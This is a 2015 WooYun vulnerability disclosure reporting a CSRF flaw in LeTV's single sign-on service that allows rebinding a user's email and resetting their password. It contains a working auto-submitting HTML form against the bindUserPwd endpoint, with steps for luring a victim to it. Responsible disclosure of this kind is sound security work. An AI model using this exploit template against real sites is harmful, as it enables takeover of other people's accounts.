当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0107951

漏洞标题:乐视网CSRF漏洞可重置任意用户密码

相关厂商:乐视网

漏洞作者: q601333824

提交时间:2015-04-15 10:53

修复时间:2015-05-30 15:08

公开时间:2015-05-30 15:08

漏洞类型:网络设计缺陷/逻辑错误

危害等级:中

自评Rank:5

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-15: 细节已通知厂商并且等待厂商处理中
2015-04-15: 厂商已经确认,细节仅向厂商公开
2015-04-25: 细节向核心白帽子及相关领域专家公开
2015-05-05: 细节向普通白帽子公开
2015-05-15: 细节向实习白帽子公开
2015-05-30: 细节向公众公开

简要描述:

乐视网CSRF漏洞可重置任意用户密码

详细说明:


1.下面这段是绑定邮箱和修改密码接口,可以修改用户密码和绑定邮箱

<html>
<body>
<form id="csrf" name="csrf" action="https://sso.letv.com/user/bindUserPwd" method="POST">
<input type="text" name="loginname" value="XXXXXXXXXXX" />
<input type="text" name="pwd" value="XXXXXXXXX" />

</form>
<script>
document.csrf.submit();
</script>
</body>
</html>


2.这两个参数不光要修改还有一些需要注意点
(1).loginname这个参数改成要绑定的邮箱
(2).pwd 这个参数改成需要修改的密码
3.其中loginname,这个参数要绑定的邮箱需必须是从来没绑定过乐视帐号新邮箱,如果是以前绑定过乐视帐号的邮箱,就算已经解绑了,也收不到绑定邮箱的邮件,所以测试的时候要注册一个新邮箱,或者从来没绑定记录乐视帐号的邮箱,就算以前绑定现在解绑也不行,必须是新的
4.下面是测试图

(1).现在我的帐号绑定是[email protected],密码a456a456,如图

QQ截图20150414192040.png


(2).然后修改参数,访问表单,一键秒改邮箱和密码,如图

3.png


5.看吧,只要目标访问CSRF页面,更换邮箱的连接发到我的邮箱了,如图

3333.png


3.png



6.从上图可以看出,我的帐号访问CSRF之后,更换邮箱的连接发到我这了,被修改成[email protected],密码被修改成1234567890,这个邮箱是我新注册用来测试

漏洞证明:

1.

QQ截图20150414192040.png


2.

3333.png


3.

3.png


4.审核的人测试的时候,邮箱最好新注册个,因为自己测试很多次,以前绑定过,就算解绑,也收不到邮件,所以测试的时候最好弄个新邮箱

修复方案:

邮箱和密码都能改了,手机和一些资料就不用说了
顺便求个乐视会员看电影

版权声明:转载请注明来源 q601333824@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-04-15 15:06

厂商回复:

感谢支持乐视安全,该漏洞已通知业务部门修复

最新状态:

暂无